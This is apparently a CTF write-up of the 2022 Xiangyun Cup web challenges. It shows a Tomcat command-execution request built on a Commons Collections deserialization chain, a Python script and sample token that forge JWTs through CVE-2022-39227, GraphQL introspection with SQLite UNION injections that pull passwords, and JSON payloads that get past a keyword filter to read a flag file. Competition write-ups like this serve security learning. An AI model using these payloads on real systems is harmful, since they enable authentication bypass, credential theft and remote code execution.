2022 Xiangyun Cup (祥云杯) Writeup - Web


The data security competition a few days ago plus the Xiangyun Cup these past two days have left me burned out...

There were three challenges in total. A few points were quite interesting, but actually solving them was painful. I won't say much here; I'll just paste the records of the key steps and links. The bolded knowledge points below will get separate study articles later.

  1. ezjava
    1. CC2
    2. No outbound network access
  2. FunWEB
    1. CVE-2022-39227 JWT forgery (a 1-day that comes with an official test case, more or less)
    2. GraphQL injection + SQLite injection
  3. RustWaf (two challenges)
    1. fs.readFileSync reading a URL-shaped array + filename decoding to get past the keyword filter
    2. Rust deserialization

ezjava

  1. Looking at the few functions in the Utils class and the CommonsCollections4 dependency, go straight for the CC2 chain

  2. Get command output echoed back by injecting into Tomcat with a modified TemplatesImpl

POST /myTest?cmd=cat+/flag HTTP/1.1
Host: 47.95.3.91:32270
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 7448


FunWEB

  1. First half: JWT forgery

  2. Second half: GraphQL injection + SQLite injection

1. Forging the token

Extract the key code to generate a usable token

from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode


def polyglot_token(token):
    """Build the polyglot token from the CVE-2022-39227 test case.

    The forged claims (sub, long expiry, is_admin) go into the compact-format
    part; the original header, payload and signature are kept as the JSON
    serialisation members, so the signature still verifies against the
    unmodified payload.
    """
    header, payload, signature = token.split('.')
    parsed_payload = loads(base64url_decode(payload))
    parsed_payload['sub'] = 'bob'
    parsed_payload['exp'] = 2000000000
    parsed_payload['is_admin'] = 1
    fake_payload = base64url_encode(dumps(parsed_payload, separators=(',', ':')))
    return ('{"  ' + header + '.' + fake_payload + '.":"",'
            '"protected":"' + header + '", "payload":"' + payload + '",'
            '"signature":"' + signature + '"}')


print(polyglot_token(input("token::")))
eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMDc2NTgsImlhdCI6MTY2NzEwNzM1OCwiaXNfYWRtaW4iOjEsImlzX2xvZ2luIjoxLCJqdGkiOiJ1aTVrcDdGMmJNMGYwYXY2cVpSRTJ3IiwibmJmIjoxNjY3MTA3MzU4LCJwYXNzd29yZCI6ImEiLCJ1c2VybmFtZSI6ImEiLCJzdWIiOiJib2IifQ.a-ALRvRlYuUfThbfYfHuUqlH75vv-LynOZBxeUc_XbIKwNrEFk3aa2xr1HfdfwFFiKKZ75yVnWY8KBH-RHQdmj7igHMDPqgwDiM5qi7fkLwyVX36cRyj79NQiiMAmyVAlrC4BaIA8EblhS1BvKecNgf1kGf6Ujyg9NtJfx6cSTbr0u-hdZ6vVH7AA_9W_-vMxBE-H10oquc4j4WRIGaossZByZp6Fy5NpPqUD9t3jZsPNU4CugHR947b0sVWJ964uaXAe8IJTGA8S6hM5NirbHDEr0qboE4dCNnV-pmbs7ENpNhfI9eTMDE6Xm0mGO94sChHicBY4pEvW7NYX23yPQ

2. GraphQL + SQLite injection

{
  __schema {
    types {
      name
    }
  }
}

query={
  __type (name: "Query") {
    name
    fields {
      name
      type {
        name
        kind
        ofType {
          name
          kind
        }
      }
    }
  }
}

query={
getscoreusingnamehahaha(name: "1' union select (select password from users) --"){ name score } }

query={
getscoreusingnamehahaha(name: "1' union select (select name from sqlite_master where type='table' limit 0,1) --"){ name score } }


Log in as admin with this password, then visit /getflag to get the flag.

RustWaf

  1. fs.readFileSync reading a file through a URL-shaped array (object)

    1. The key-value pairs the array must carry

    2. Using URL decoding to get past the flag keyword filter

      An interesting Node challenge from corCtf2022

  2. Rust deserialization to get past the key keyword check

    serde_json manual

    Rust study notes (basic Rust syntax)

The input goes through two JSON parses; each is bypassed separately:

{
    "protocol":"file:",
    "\uD800":"",
    "href":"1",
    "origin":"1",
    "pathname":"/%66%6c%61%67",
    "hostname":""
}


There is also a simpler and easier-to-understand method: pass an array directly, in the order of the Rust struct's fields, which bypasses the protocol keyword (serde's derived Deserialize also accepts a sequence for a struct, matching the elements to the fields in declaration order).

[
    "file:",
    "1",
    "1",
    "/%66%6c%61%67",
    ""
]